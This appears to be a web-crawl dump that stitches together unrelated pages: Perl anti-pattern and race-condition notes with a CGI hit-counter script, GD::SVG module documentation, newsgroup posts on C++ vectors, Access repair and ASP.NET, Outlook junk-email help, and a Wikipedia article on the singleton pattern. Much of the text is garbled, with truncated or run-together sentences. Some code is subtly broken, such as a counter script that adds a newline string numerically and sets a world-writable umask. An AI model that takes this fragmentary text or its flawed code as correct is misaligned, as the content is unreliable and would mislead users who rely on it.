goto.: 1. Side effects: Each method called seems to do countless unrelated unexpected things, making the normal flow difficult to understand or discover. When writing new code, it is often impossible to reuse existing code because of the unfathomed grouping of unrelated tasks. 2. Dark heart: The heart of each routine, object, module, etc is buried somewhere deep in its bowels, poorly or not marked, and reached through an obscure path, kind of like an Egyptian pyramid. 3. Ransom transaction: Data is communicated through global variables, or stashing data in some remote object. This is akin to conducting a ransom transaction by demanding that money be thrown into a dumpster in an abandoned industrial complex to be picked up by someone who will presumably flee and kill the kidnapee should either cops be there or money not be. This is an entirely unwholesome way to conduct a transaction. 4. Three cups and nut: Large amounts of unrelated things are grouped together without regard for when, how, by whom, in what order, under what conditions, or why they are used. Since they all look alike and any be used at any time, getting lost is easy. Which one actually gets used may well be a slight of hand anyway. 5. Wheel factory: Reinventing the wheel, or stack, or program control constructs, or parameter passing mechanisms, or anything else which should be both standardized throughout a language and completely factored out of the language. This clutters the program with difficult to understand, repeated idiom. If Spaghetti code is needed, it can take on a life of its own. Most large projects have some legacy code that forms the heart of their project that is no longer represented by a human who wrote it. See also: "LavaFlow" in LavaFlow, "GodObject" in GodObject, "ObjectOrgy" in ObjectOrgy External Pages Linking to This Page: Thats a thought. Some common goto idioms, documented in the interest of untangling them. Linux kernel uses a goto-on-failure idiom where error return codes are set just in case, but that is the actual result code only when an error causes a goto to exit the function. Other program simulate stacks using temporary variables that they stash things in - the sure suffered from that. When code just kind of spews forth and becomes permanent, it becomes an architectural feature of the archeological variety. Things are built atop the structure without question and without hope of changing what is beneath them. The existing code is seen has historical curiosity. XXX There is a tale of a computer manufacturer, back in the days when each vendor had their own CPU. There was a bug in their new processor, and production schedules didn't give them time to work it out. The department responsible for coding the system software (operating system) for the thing was instructed to work around it. The system software dutifully avoided tickling the bug, and documented the presence of it for anyone writing applications for the machine. Software was ported to the machine, and unsure what to make of the bug warned end users that certain feature of the applications didn't function correctly on this machine. Hardware or software that serves no useful purpose that is kept around for political reasons. Often, everyone is secretly waiting for it to be used again, so it is no longer a derelict eyesore. Not sure this antipattern really fits with the motif of this text. Problem: Using 100% of the CPU to wait for an event. while(1) { if(@queue) { dosomething(); } } This example applies to threaded code, but non threaded code can fall prey as well: while(! -f $file) { } # do something with $file here Both. Using sleep() and yield() from the threads package is an improvement. Sometimes polling is unavoidable. When you wrote the code you're waiting on, using thread::shared::semaphore lets you easily and efficiently communicate readiness between threads. Unix programs have no way of being notified when a file shows up, so polling may be the only solution: just sleep() so others can get work done. Non-Blocking I/O IO::Socket::INET ( Socket::INET) has a -blocking(0)> method to disable blocking. Blocking halts the program until data is available to read. In a program running as a daemon or server - see - that needs to service I/O on multiple channels, this is unacceptable - blocking must be disabled. Code like this will be written: # this program attempts to use 100% of CPU time use IO::Socket::INET; my $sock = IO::Socket::INET->new(PeerAddr => '', PeerPort => 'http(80)', Proto => 'tcp'); $sock->blocking(0); while(1) { read $sock, my $buffer, 8192; do_something_with_data($buffer); } The program should sleep, waiting for data to arrive, rather than looping constantly and trying over and over again. See "SelectPollPattern" in SelectPollPattern for a solution using the select() call. Signals to Wake By sleep() and I/O operations are aborted by incoming signals, as sent from the shell with the "kill" command or from another process using the kill() function on your PID. When I/O is aborted, it returns a zero-length string, not undef. Read-loops using while() work correctly: while(<$fh>) { print; } This may print zero length strings sometimes, but no one will ever know. while(<$fh)> continues looping. Sometimes you want to sleep for a fixed period, no matter what. my $waketime = scalar(time()) + 60*60*8.5; # longer on the weekends while(scalar time() < $waketime) { sleep $waketime - scalar time(); # sleep the rest of the duration - probably } "DebuggingPattern" in DebuggingPattern has a tiny example of dumping stack when a signal comes in. When fork()ing, children send CHLD signals to their parent when the child dies. The parent should have a signal handler set up to reap these: see. Categories See Also Problem: Multitasking operating systems change tasks at unexpected times, such as between two lines of the program, or half way through a statement. This creates subtle bugs that pop up "now and then". Solution: Use flock() and semaphores to guard access to things accessed by more than one process or thread. Nature of the Race Condition Malak tells you: wee! :-) ok here is the question. if i have two copies of a script downloading the same set of files (to make it go faster) i want to make sure that one script doesnt try to download the same file as the other. right now i'm using a -e check to see if the file exists but im not sure if this will ever cause a problem if both scripts happen to hit the same file at the same time Yes, there is a race condition between the time that you test for the file with //-e// and when you create the file with //open()//. It could well happen that you test to see if the file, is there, it isn't, you go to open it for write and over write another process. if(! -e $file) { open my $f, '>', $file; download($f); } You tell Malak: yes. use sysopen(). open for write but not create. if it returns error status, the race condition bit ya, move on to the next file Malak tells you: not sure if i can do that. im calling an external program to actually do the download... You tell Malak: why don't you use threads, then? then you can create a hash that is shared between all threads and use it to do locking use threads::shared; my :shared %locks; Malak tells you: i wonder if the race condition matters though... which ever process finishes downloadig last should write the file and replace whatever the other file wrote, right? You tell Malak: yeah Malak tells you: i dont care if that happens, all i care about is that no files get corrupted, seemingly downloaded good when they arent You tell Malak: actually, on unix, what would happen is the same would be downloaded, twice, at the same time, but only one of the inodes would actually exist on the filesystem, so when the other processed closes its filehandle, the filesystem will deallocate the blocks File-Access Race Conditions Files require coordinated access when there is any chance that multiple processes could attempt to access the same file at the same time. It could be two instances of the same application running (Mozilla, mutt, gtk-gnutella), or it could be two fork()ed processes of the same application, or threads. displays a web counter that I cooked up as a quick amusement some time ago. It is a 1 bit animaged GIF that displays 30 iterations of Conways Game of Life [41] applied to the current hit number. At the time of this writing, it is at 3866. It uses flock() to guard access to the "counter" file, which contains the current hit number. Initially, I didn't bother, and every 1000 hits or so, it would reset to 0. Ooops. Just as one process had opened the file for write and truncated it, the other process went to read the value, and got zero. The second process would finish after the first, and it would increment zero to get one, and write that back. All of these dire warnings apply to access to datastructures in memory, such as those using Sys::Mmap ( Mmap), and to .dbm files accessed with dbmopen() or a similar routine. This code depends on the fine package, available from . The lock should be established before reading, in cases where a value is read, modified, then written back - cases including counters like web counters. #!/usr/bin/perl print "Content-type: image/gif\n"; print "Pragma: no-cache\n"; print "\n"; my $pid = $$; # our pid, not the pid of some shell or something umask 000; local $ENV{PATH} = '/usr/local/bin'; open my $f, '+<', 'counter'; flock $f, 2; $counter=<$f>; $counter++; seek $f, 0, 0; printf $f $counter + "\n"; close $f; system "pbmtext $counter | pnmcrop 2>/dev/null | pnmenlarge 3 > counter10.$pid.pbm 2>/dev/null "; for(my $i=10;$i<30;$i++) { my $j = $i + 1; system "pbmlife counter$i.$pid.pbm > counter$j.$pid.pbm 2>/dev/null"; } open my $gif, "ppmtogif -delay 40 -loop 100 counter??.$pid.pbm 2>/dev/null|"; while(read $gif, my $buf, 1024, 0) { print $buf; } close $gif; # this isn't working :( for(my $i=10;$i<31;$i++) { unlink "counter$i.$pid.pbm"; } Didn't anyone ever tell you web-page hit counters were useless? They don't count number of hits, they're a waste of time, and they serve only to stroke the writer's vanity. It's better to pick a random number; they're more realistic. Here's a much better web-page hit counter: $hits = int( (time() - 850_000_000) / rand(1_000) ); If the count doesn't impress your friends, then the code might. :-) - "PerlDoc" in PerlDoc:perlfaq5 by and When several processes are reading the current value (as it stands at any given moment), and one process is independently generating and storing new values, file I/O still has a race condition where the file may be null, between the time the file is truncated and the new data written. This also requires locking. has an example of a multi-player Life game, where locking is not needed. Single bits are modified in the Sys::Mmap ( Mmap) 'd image during any hit, and the current board is displayed. Since random memory access is being used rather than file I/O, truncated files aren't a concern. SQL engines want something like this, but the problem is far more complex. They must use generational locks, where each "update" or "insert" represents a generation. Only records marked at or earlier than the current generation at the time a query is started are returned in a query. "update" must add a new record with a newly incremented generation number before removing the old one in order to let currently executing queries run without garbled results. This arrangement lets one "insert"/"update" or other write operation happen at the same time as an arbitrary number of queries. Generational systems like this are also used in garbage collection, to avoid race conditions between the thread that is collecting unreferenced memory and the running program. Thread Datastructure Race Conditions XXX, See Also Synopsis Anti-patterns stereotype pathological, degenerate code. The God Object anti-pattern afflicts Perl programs at a shocking rate. It is a hold over from top down design in procedural languages. It's the first trap aspiring Object Oriented programs fall into, so it's a suitable first Anti-Pattern. I assume that you know the basic syntax for creating objects in Perl. If not, go read Tom Christiansen's tutorial at [42] then come right back - this is the next thing you need to know. Anti Patterns Programming is fun. "Hacking on a program" is an expression of the glee that comes from rapidly adding neat features to a program. Programmers are optimisits. We assume that each feature in the specification for a project can be added in a constant amount of time even as the code grows, and we add each new feature just like we added the last. In other words, that programs are completed in linear time. The last half, recursively, takes twice as long. Unchecked code growth destroys a program from the inside out. Sure signs of unchecked growth are: Code degeneration causes lack of programmer interest, which leads to forked Open Source projects, over budget or failed commercial ventures, and most horrifically, loss of interest in working on a program that used to be fun. Reading difficult to comprehend code is work. If the quality of the code is good, this work is rewarded. If the quality is poor, the reader suffers the code with no joy or benefit. There are volumes full of difficult to understand code that people willingly pour over. Programming Pearls is one such book [44]. The readers patience in studying the algorithms is rewarded with deep insight. Quality is difficult to put your thumb on and impossible to quantify. Just because code is difficult to read doesn't mean it isn't worth your time. It is our job to make it worth reading, worth keeping, worth reusing, and worth hacking on. God Object Anti-Pattern Named for the conspicous centralization of control. It is a hold over from procedural languages and top-down design. Top-down design states that the way
http://search.cpan.org/~swalters/Object-PerlDesignPatterns-0.03/PerlDesignPatterns.pm
crawl-002
en
refinedweb
GD::SVG - Seamlessly enable SVG output from scripts written using GD # use GD; use GD::SVG; # my $img = GD::Image->new(); my $img = GD::SVG::Image->new(); # $img->png(); $img->svg();). GD::SVG exports the same methods as GD itself, overriding those methods.. GD::SVG requires the Ronan Oger's SVG.pm module, Lincoln Stein's GD.pm module, libgd and its dependencies. These are the primary weaknesses of GD::SVG.. You must change direct calls to the classes that GD invokes: GD::Image->new() should be changed to GD::SVG::Image->new() See the documentation above for how to dynamically switch between packages. As SVG documents are not inherently aware of their canvas, the flood fill methods are not currently supported. Although setPixel() works as expected, its counterpart getPixel() is not supported. I plan to support this method in a future release. GD::SVG works only with scripts that generate images directly in the code using the GD->new(height,width) approach. newFrom() methods are not currently supported. Any functions passed gdTiled objects will die.. GD::SVG currently only supports the creation of image objects via its new constructor. This is in contrast to GD proper which supports the creation of images from previous images, filehandles, filenames, and data.. Once a GD::Image object is created, you can draw with it, copy it, and merge two images. When you are finished manipulating the object, you can convert it into a standard image file format to output or save to a file. GD::SVG implements a single output method,)" NOT IMPLEMENTED Provided with a color index, remove it from the color table. This returns the index of the color closest in the color table to the red green and blue components specified. This method is inherited directly from GD. Example: $apricot = $myImage->colorClosest(255,200,180); NOT IMPLEMENTED NOT IMPLEMENTED Retrieve the color index of an rgb triplet (or -1 if it has yet to be allocated). NOT IMPLEMENTED NOT IMPLEMENTED Retrieve the total number of colors indexed in the image. NOT IMPLEMENTED Provided with a color index, return the RGB triplet. In GD::SVG, color indexes are replaced with actual RGB triplets in the form "rgb($r,$g,$b)". Control the transparency of individual colors. NOT IMPLEMENTED GD implements a number of special colors that can be used to achieve special effects. They are constants defined in the GD:: namespace, but automatically exported into your namespace when the GD module is loaded. GD::SVG offers limited support for these methods.. Lines drawn with line(), rectangle(), arc(), and so forth are 1 pixel thick by default. Call setThickness() to change the line drawing width.. NOT IMPLEMENTED The GD special color gdStyled is partially implemented in GD::SVG. Only the first color will be used to generate the dashed pattern specified in setStyle(). See setStyle() for additional information. NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED Set the corresponding pixel to the given color. GD::SVG implements this by drawing a single dot in the specified color at that position.. NOT IMPLEMENTED This draws a rectangle with the specified color. (x1,y1) and (x2,y2) are the upper left and lower right corners respectively. You may also draw with the special colors gdBrushed and gdStyled.); NOT IMPLEMENTED NOT IMPLEMENTED); Same as the previous example, except that it draws the text rotated counter-clockwise 90 degrees.. NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED getBounds() returns the height and width of the image. NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED NOT IMPLEMENTED SVG is much more adept at creating polygons than GD. That said, GD does provide some rudimentary support for polygons but must be created as seperate objects point by point. Create an empty polygon with no vertices. $poly = new GD::SVG::Polygon; Add point (x,y) to the polygon. $poly->addPt(0,0); $poly->addPt(0,50); $poly->addPt(25,25);); NOT IMPLEMENTED Return the number of vertices in the polygon. Return a list of all the verticies in the polygon object. Each mem- ber. Returns the number of vertices affected. Please see GD::Polyline for information on creating open polygons and splines.). This is a tiny, almost unreadable font, 5x8 pixels wide. This is the basic small font, "borrowed" from a well known public domain 6x12 font. This is a bold font intermediate in size between the small and large fonts, borrowed from a public domain 7x13 font; This is the basic large font, "borrowed" from a well known public domain 8x16 font. This is a 9x15 bold font converted by Jan Pazdziora from a sans serif X11 font. This returns the number of characters in the font. print "The large font contains ",gdLargeFont->nchars," characters\n"; NOT IMPLEMENTED This returns the ASCII value of the first character in the font These return the width and height of the font. ($w,$h) = (gdLargeFont->width,gdLargeFont->height); The Bio::Graphics package of the BioPerl project makes use of GD::SVG to export SVG graphics.: I've also prepared a number of comparative images at my website (shameless plug, hehe): The following internal methods are private and documented only for those wishing to extend the GD::SVG interface.. The _reset() method is used to restore persistent drawing settings between uses of stylized brushes. Currently, this involves - restoring line thickness. Todd Harris, PhD <[email protected]> Copyright 2003 by Todd Harris and the Cold Spring Harbor Laboratory This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself. GD, SVG, SVG::Manual, SVG::DOM
http://search.cpan.org/~twh/GD-SVG-0.25/SVG.pm
crawl-002
en
refinedweb
Re: STL Vector - pass by reference? - From: "Scott McPhillips [MVP]" <org-dot-mvps-at-scottmcp> - Date: Thu, 09 Aug 2007 16:52:46 -0400 Gerry Hickman wrote: Hi, In an earlier thread entitled "STL vector - which style of for() loop?" I had a function that could populate a vector (with a variable number of strings) and pass it back to the caller, but people pointed out this would create a "copy" of the vector and it may be better to pass by reference. Doug Harrison offered this example: ----- example start ----- I would use pass-by-reference to avoid this needless cost, e.g. vector<string>::size_type void GetDeviceClasses(vector<string>& guids) { guids.clear(); // If you can estimate n, reserve can eliminate reallocations. // guids.reserve(n); ... returns guids.size(); } ----- example end ----- but when I came to actually code this, I ran into some problems. I managed to code something that appears to achieve the objective, but my code is almost "back-to-front" (in terms of * and &) of what Doug posted. Can someone clarify? ----- my attempt ----- using namespace std; // just for this demo vector<string> guids; PopulateStrings(&guids); cout << "Count of guids is now " << guids.size(); // prints 2 void PopulateStrings(vector<string> * guids) { guids->clear(); guids->push_back("test1"); guids->push_back("test2"); } ----- end my attempt ----- There are two ways to "pass by reference." They are to pass a reference, or to pass a pointer. Doug showed using a reference, your version is using a pointer. Performance would be equal either way. -- Scott McPhillips [MVP VC++] . - References: - STL Vector - pass by reference? - From: Gerry Hickman - Prev by Date: Re: Converting LBYTE to int - Next by Date: Re: STL Vector - pass by reference? - Previous by thread: STL Vector - pass by reference? - Next by thread: Re: STL Vector - pass by reference? - Index(es):
http://www.tech-archive.net/Archive/VC/microsoft.public.vc.language/2007-08/msg00329.html
crawl-002
en
refinedweb
Re: Compact and repair problems - From: "Granny Spitz via AccessMonster.com" <u26473@uwe> - Date: Thu, 26 Oct 2006 19:05:54 GMT enak wrote: Any way, this morning when he tried to run the compact and repair utility he got an error that states "Microsoft Access has encountered a problem and needs to close". That is it. Make a copy of the file and work only with the copy. Keep the original intact in case you need to send it to a recovery company. Press the shift key down while opening the copy so the startup code doesn't execute. Open a module and compile the code if it's not compiled. Create a new database and import all objects from this copy into the new database. Try compacting the new database. -- Message posted via . - Prev by Date: Re: Problem with tab control - Next by Date: Re: new Access 2003 All wizards available fields always blank - Previous by thread: Re: about microsoft access 2002... - Next by thread: RE: Compact and repair problems - Index(es):
http://www.tech-archive.net/Archive/Access/microsoft.public.access.gettingstarted/2006-10/msg00653.html
crawl-002
en
refinedweb
How do I turn on the junk email feature? From: Chuck Davis (anonymous_at_discussions.microsoft.com) Date: 11/03/04 - ] Date: Tue, 2 Nov 2004 18:42:53 -0800 >-----Original Message----- >I have microsoft xp and I want to filter out some of the junk email but >outlook tells me that the junk email feature needs to be turned on, how do i >do that? >. > The following is from Outlook Help! The new Junk E-mail Filter replaces the rules used in previous versions of Microsoft Outlook to filter e-mail messages. The Junk E-mail Filter is on by default, and the protection level is set to Low, which is designed to catch the most obvious junk e-mail messages. Any message that is caught by the Junk E-mail Filter is moved to a special Junk E-mail folder, where you can retrieve or review it at a later time. You can make the filter more aggressive, which may mistakenly catch legitimate messages, or you can even set Microsoft Office Outlook 2003 to permanently delete junk e-mail messages. There are two parts to the Junk E-mail Filter: the Junk developed by Microsoft Research that evaluates whether an unread message should be treated as a junk e-mail message based on several factors, such as the time it. Note Text marked with an orange asterisk () indicates a feature that is introduced with Microsoft Office 2003 Service Pack 1. To get Service Pack 1, go to Downloads on Office Online. Under Office Update, click Check for Updates. Junk E-mail Filter Updates Updates to the Junk E-mail Filter are available at Downloads on Office Online. Under Office Update, click Check for Updates. Junk E-mail Filter Lists There are five Junk E-mail Filter Lists: Safe Senders List (Safe Senders List: A list of domain names and e-mail addresses that you want to receive messages from. E-mail addresses in Contacts and in the Global Address Book are included in this list by default.), Safe Recipients List (Safe Recipients List: A list of mailing lists or other subscription domain names and e-mail addresses that you belong to and want to receive messages from. Messages sent to these addresses will not be treated as junk e-mail.), Blocked Senders List (Blocked Senders List: A list of domain names and e-mail addresses that you want to be blocked. E-mail addresses and domain names on this list are always treated as junk e-mail or spam.), and two International lists: Blocked Encodings List (Blocked Encodings List: A list that allows you to block a language encoding or character set in order to filter out unwanted international e-mail messages that display in a language you don't understand.) and Blocked Top-Level Domains List (Blocked Top-Level Domains List: A list that allows you to block top-level domain names. Blocking country/region top-level domains allows you to filter unwanted e-mail messages you receive from specific countries or regions.). If a name or e-mail address is on both the Blocked Senders List and the Safe Senders List, the Safe Senders List takes precedence over the Blocked Senders List; this reduces the possibility that messages that you want will be mistakenly marked as junk e-mail messages.. default. Therefore, messages from people in your Contacts folder will never be treated as junk e-mail messages. Contacts but are people whom you correspond with regularly are included in this list by default through the Automatically add people I e-mail to the Safe Senders List check box. Notes The recipient's e-mail address is saved by default only when you create and send the message the usual way in Outlook, as opposed to a message generated automatically by a program. Personal distributions lists will not be added by using this check box. If you accidentally reply to a spammer's e-mail message- for example, to unsubscribe- and this check box is selected, that spammer's address will be added to the Safe Senders List. If you notice the spammer's subsequent messages in your Inbox, you must add them to the Blocked Senders List and remove the corresponding entry from the Safe Senders List. If the same address is in both the Blocked Senders List and the Safe Senders List, the Safe Senders List takes precedence and the address will not be considered junk.. You can also configure Outlook to accept messages only from people on your Safe Senders List, giving you total control over which messages are delivered to your Inbox. certain e-mail address or domain name by adding the sender to this list. Messages from people or domain names on this list are always treated as junk, regardless of the content of the message. When you add a sender's name or e-mail address to the Blocked Senders List, Outlook moves the message to the Junk E-mail folder. If Automatic Picture Download is turned off, messages from or to e-mail addresses or domain names on the Safe Senders List and Safe Recipients List will be treated as exceptions and the blocked content will be downloaded. If you have existing lists of safe or blocked names and addresses, you can import this information into Outlook 2003 by saving the list as a text (.txt) file with one entry per line, and then importing the list. If you want to share your Junk E-mail Filter Lists, create a copy for backup purposes, or print a list, you can export the e-mail addresses on the list to a text (.txt) file. entries take precedence over domain name entries. To block an entire domain but still see specific safe addresses, add the specific entries to the Safe Senders List. For example, add [email protected] to the Safe Senders List and @example.com to your Blocked Senders List. This blocks any address except [email protected]. International List To block unwanted e-mail messages that come from another country or region or appear in another language, there are two lists. Blocked Top-Level Domains List This list enables you to block e-mail addresses that end in a specific top-level domain (top-level domain: The broadest name category at the end of e-mail addresses. Generic top-level domains include .com, .edu, .gov, .net, and .org. Country code top-level domains use two letters, for example, [email protected] and [email protected].). For example, selecting the CA [Canada], US [United States], and MX [Mexico] check boxes in the list would block messages with e-mail addresses like these: [email protected], [email protected], and [email protected]. Additional country codes appear in the list. This helps you to eliminate unwanted e-mail messages that you receive from specific countries or regions. Blocked Encodings List This list enables you to block all e-mail addresses in a specific language encoding (encoding: A method for representing characters in HTML or plain-text e-mail messages, examples include US-ASCII, Unicode (UTF-8), and Western European (ISO). Outlook automatically selects an optimal encoding for outgoing the vast majority of junk e-mail is sent in the US-ASCII encoding. The remaining junk e-mail is sent in various other international encodings, so this list gives you the ability to filter out unwanted international e-mail that is displayed in a language that you don't understand. Notes Unicode (Unicode: A character encoding standard developed by the Unicode Consortium. By using more than one byte to represent each character, Unicode enables almost all of the written languages in the world to be represented by using a single character set.) encodings are not included in the Blocked Encodings List. Messages with unknown or unspecified encodings will be subject to filtering by the regular Junk E-mail Filter. The Junk E-mail Filter can be used with the following types of e-mail accounts: A Microsoft Exchange Server e-mail account in Cached Exchange Mode An Exchange Server account that delivers.) HTTP (HTTP (Hypertext Transfer Protocol): Protocol that is used when you access Web pages from the Internet. Outlook uses HTTP as an e-mail protocol.) (MSN Hotmail) POP3 (POP3: A common protocol that is used to retrieve IMAP (IMAP (Internet Message Access Protocol): Unlike Internet e-mail protocols such as POP3, IMAP creates folders on a server to store/organize messages for retrieval by other computers. You can read message headers only and select which messages to download.) Microsoft Office Outlook Connector for IBM Lotus Domino Outlook Connector for MSN All e-mail accounts in the same Outlook user profile (Outlook user profile: A group of e-mail accounts and address books. Typically, a user needs only one but can create any number, each with a set of e-mail accounts and address books. Multiple profiles are useful if more than one person uses the computer.) share the same Junk E-mail settings and lists. If you have both an Exchange Server has a Junk E-mail folder. However, If you have both an Exchange Server e-mail account and a POP3 account, both If you change your profile, you should export a copy of your Junk E-mail Lists before making the changes, and then import the information into Outlook 2003 to avoid having to re-create your Junk E-mail Filter Lists. Different versions of Microsoft Exchange Server and the Junk E-mail Filter Versions earlier than Microsoft Exchange Server 2003 If you use Cached Exchange Mode or download to a Personal Folders file (.pst) You can create and use the Junk available from any computer that you use. Note that if you use both Cached Exchange Mode and download to a Personal Folders file (.pst) as your default delivery location, the Junk E-mail Filter Lists will be available only on the computer used to add the names and addresses. If you work online The Junk E-mail Filter is not available. Exchange Server 2003 If you use Cached Exchange Mode or download to a Personal Folders file (.pst). If you work online. Note If you work online or use Cached Exchange Mode and download to a Personal Folders file (.pst) as your default delivery location, the Junk E-mail Filter Lists will be available only on the computer used to add the names and addresses. Rules and the Junk E-mail Filter Rules are now designed so that they do not act on messages that have been moved to the Junk E-mail folder. This keeps than moving it to another folder according to the rule. Best practices for managing junk e-mail. Turn off automatic processing of meeting requests and read and delivery receipts Spammers sometimes resort to sending meeting requests and messages with delivery receipts requested. Responding to meeting requests and read and delivery receipts automatically makes you vulnerable to Web beacons. Limit where you post your e-mail address Be cautious about posting your e-mail address on public Web sites, and remove your e-mail address from your personal Web site. If you list or link to your e-mail address, you can expect to be spammed. Disguise (or "munge") your e-mail address when you post it to a newsgroup, chat room, bulletin board, or other public places For example, you can give your e-mail address as "[email protected]" by using the number zero instead of the letter "o." This way, a person can interpret your address, but the automated programs that spammers use cannot. Use multiple e-mail addresses for different purposes You might set up one for personal use to correspond with friends, family, or colleagues, and use another for more public activities, such as requesting information, shopping, or for subscribing to newsletters, discussion lists, and newsgroups. Review the privacy policies of Web sites When you sign up for online banking, shopping, and newsletters, review the privacy policy closely before you reveal your e-mail address and other personal information. Look at the Web site for a link (usually at the bottom of the home page) or section called "Privacy Statement," "Privacy Policy," "Terms and Conditions," or "Terms of Use." If the Web site does not explain how it will use your personal information, think twice about using that service.. Don't reply to spam Don't reply even to unsubscribe unless you know and trust the sender. Answering spam just confirms that your e-mail address is live. If a company uses e-mail messages to ask for personal information, don't respond by sending a message Most legitimate companies will not ask for personal information in e-mail. Be suspicious if they do. It could be a spoofed tactic is known as "phishing" because, as the name implies, the spam is used as a means to "fish" for your credentials, such as your account number and passwords that are necessary to access and manipulate your financial accounts. If the spam is from a company that you do business with - for example, your credit card company - call the company, but don't use a phone number provided on the e-mail. Use a number that you find yourself, either through directory assistance, a bank statement, a bill, or other source. If it is a legitimate request, the telephone operator should be able to help you. Don't contribute to a charity based on a request in e-mail Unfortunately, some spammers prey on your good will. If you receive an appeal from a charity, treat it as spam. If it is a charity that you want to support, find their number elsewhere and call them to find out how you can make a contribution. Don't forward chain e-mail messages Besides causing more traffic over the line, forwarding a chain e-mail message might be furthering a hoax, and you lose control over who sees your e-mail address. - ]
http://www.tech-archive.net/Archive/Outlook/microsoft.public.outlook.general/2004-11/0958.html
crawl-002
en
refinedweb
actions across the system. Sometimes it is generalized to systems that operate more efficiently when only one or a few objects exist. It is also considered an anti-pattern by some people, who feel that it is overused, introducing unnecessary limitations in situations where a sole instance of a class is not actually required, and introduces global state into an application. [1][2][3][4][5][6] Common uses - The Abstract Factory, Builder, and Prototype patterns can use Singletons in their implementation. - Facade objects are often Singletons because only one Facade object is required. - State objects are often Singletons. - Singletons are often preferred to global variables because: Class diagram Implementation protected (not private, because reuse and unit test could need to access the constructor).. Example implementations Java The Java programming language solutions provided here are all thread-safe but differ in supported language versions and lazy-loading. Traditional simple way This solution is thread-safe without requiring special language constructs, but it may lack the laziness of the one below. The INSTANCE is created as soon as the Singleton class is initialized. That might even be long before getInstance() is called. It might be (for example) when some static method of the class is used. If laziness is not needed or the instance needs to be created early in the application's execution, or your class has no other static members or methods that could prompt early initialization (and thus creation of the instance), this (slightly) simpler solution can be used: public class Singleton { private static final Singleton INSTANCE = new Singleton(); // Private constructor prevents instantiation from other classes private Singleton() {} public static Singleton getInstance() { return INSTANCE; } } The solution of Bill Pugh is known as the initialization on demand holder idiom, is as lazy as possible, and works in all known versions of Java. It takes advantage of language guarantees about class initialization, and will therefore work correctly in all Java-compliant compilers and virtual machines. The inner; } } C # /// <summary> /// Thread-safe singleton example without using locks /// </summary> public sealed class Singleton { private static readonly Singleton instance = new Singleton(); // Explicit static constructor to tell C# compiler // not to mark type as beforefieldinit static Singleton() { } private Singleton() { } /// <summary> /// The public Instance property to use /// </summary> public static Singleton Instance { get { return instance; } } } Python class Singleton(type): def __init__(cls, name, bases, dict): super(Singleton, cls).__init__(name, bases, dict) cls.instance = None def __call__(cls, *args, **kw): if cls.instance is None: cls.instance = super(Singleton, cls).__call__(*args, **kw) return cls.instance class MyClass(object): __metaclass__ = Singleton print MyClass() print MyClass() Prototype-based singleton In a prototype-based programming language, where objects but not classes are used, a "singleton" simply refers to an object without copies or that is not used as the prototype for any other object. Example in Io: Foo := Object clone Foo clone := Foo Example of use with the factory method pattern The singleton pattern is often used in conjunction with the factory method bound to the platform-specific java.awt.peer.WindowPeer implementation. Neither the Window class nor the application using the window needs to be aware of which platform-specific subclass of the peer is used. Drawbacks It should be noted that this pattern makes unit testing far more difficult[9], as it introduces Global state into an application. Advocates of Dependency Injection would regard this as an anti pattern, mainly due to its use of private and static methods. In a nod to the concept of 'Code Smells', this pattern has also been known as the Stinkleton pattern. (coined by Robert Penner). References - ^ Alex Miller. Patterns I hate #1: Singleton, July 2007 - ^ Scott Densmore. Why singletons are evil, May 2004 - ^ Steve Yegge. Singletons considered stupid, September 2004 - ^ J.B. Rainsberger, IBM. Use your singletons wisely, July 2001 - ^ Chris Reath. Singleton I love you, but you're bringing me down, October 2008 - ^ - ^ Gamma, E, Helm, R, Johnson, R, Vlissides, J: "Design Patterns", page 128. Addison-Wesley, 1995 - ^ Pugh, Bill (November 16, 2008). "The Java Memory Model".. Retrieved on April 27, 2009. - ^ - "C++ and the Perils of Double-Checked Locking" Meyers, Scott and Alexandrescu, Andrei, September 2004. - "The Boost.Threads Library" Kempf, B., Dr. Dobb's Portal, April 2003. External links - Singleton Design Pattern in Java - Singletons are Pathological Liars by Miško Hevery - Java Singleton Design Pattern - The "Double-Checked Locking is Broken" Declaration (Java) - Java Singleton Pattern - A Pattern Enforcing Compiler that enforces the Singleton pattern amongst other patterns - Description from the Portland Pattern Repository - Implementing the Singleton Pattern in C# by Jon Skeet - A Threadsafe C++ Template Singleton Pattern for Windows Platforms by O. Patrick Barnes - Implementing the Inheritable Singleton Pattern in PHP5 - Singleton Pattern and Thread Safety - PHP patterns - Javascript implementation of a Singleton Pattern by Christian Schaefer - Singletons Cause Cancer by Preston Lee - Singleton examples - Article "Double-checked locking and the Singleton pattern" by Peter Haggar - Article "Use your singletons wisely" by J. B. Rainsberger - Article "Simply Singleton" by David Geary - Article "Description of Singleton" by Aruna - Article "Why Singletons Are Controversial" - The Google Singleton Detector analyzes Java bytecode to detect singletons, so that their usefulness can be evaluated. - Jt J2EE Pattern Oriented Framework - Serialization of Singleton in Java - Singleton at Microsoft patterns & practices Developer Center - Singleton Pattern in Cairngorm 2.1 with Actionscript 3 - Standard way of implementing Singletons in ActionScript 3 This entry is from Wikipedia, the leading user-contributed encyclopedia. It may not have been reviewed by professional editors (see full disclaimer)
http://www.answers.com/topic/singleton-pattern
crawl-002
en
refinedweb
Re: How to call a Sub function from .ASPX file ? - From: "Kevin Spencer" <kevin@xxxxxxxxxxxxxxxxxxxxxxxxxx> - Date: Wed, 10 Aug 2005 17:44:15 -0400 Sorry dude, it may be all YOU need, but my requirements go a good bit farther. -- HTH, Kevin Spencer Microsoft MVP ..Net Developer Everybody picks their nose, But some people are better at hiding it. "tom pester" <Tom.PesterDELETETHISSS@xxxxxxxxxx> wrote in message news:a1a977a2e3efa8c76c0ed0ef52f2@xxxxxxxxxxxxxxxxxxxxx > Hi Kevin, > > This article is what you need when using asp.net 1.1 > > > > It gest even simpler if you use asp.net v2. In this cas just drop the > class file in the App_Code directory and you can call them everywhere. > > Let me know if you have any more questions... > > Cheers, > Tom Pester > >> You're not thinking fourth-dimensionally! (- Back to the Future) >> >> Actually, you're not thinking Object-Orientationally. >> >> ASP.Net is object-oriented, and you'd better get acquainted with it, >> or you'll be visiting here almost daily, and writing crappy code until >> you do. Let me elaborate, if you will: >> >> Files are source code. Your application doesn't have files. It has >> classes. A file defines a class, but IS not a class. A class is a data >> type, and exists in the context of a running application. So, when >> you're talking about how your application works, the first thing you >> need to do is think about classes, not files. A file can contain one >> or MORE class definitions, and you need to get acquainted with classes >> to be successful with .Net. >> >> Classes are very important in .Net 